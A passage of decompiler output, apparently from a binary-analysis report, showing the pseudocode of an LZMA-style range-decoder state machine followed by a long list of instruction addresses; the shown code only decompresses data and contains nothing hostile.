												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                                                                        0x00406566
                                                                                                        0x00406566
                                                                                                        0x00406566
                                                                                                        0x00406566
                                                                                                        0x0040656c
                                                                                                        0x00406570
                                                                                                        0x00406574
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040689f
                                                                                                        0x004068a8
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068f6
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x004068f8
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x004069ad
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x0040687b
                                                                                                        0x00406881
                                                                                                        0x00406888
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00000000
                                                                                                        0x00406893
                                                                                                        0x004068fd
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcb
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd5
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406030
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607a
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a4
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060ea
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x004069a1
                                                                                                        0x00000000
                                                                                                        0x004069a1
                                                                                                        0x004067f8
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x00000000
                                                                                                        0x004061be
                                                                                                        0x00406138
                                                                                                        0x00406138
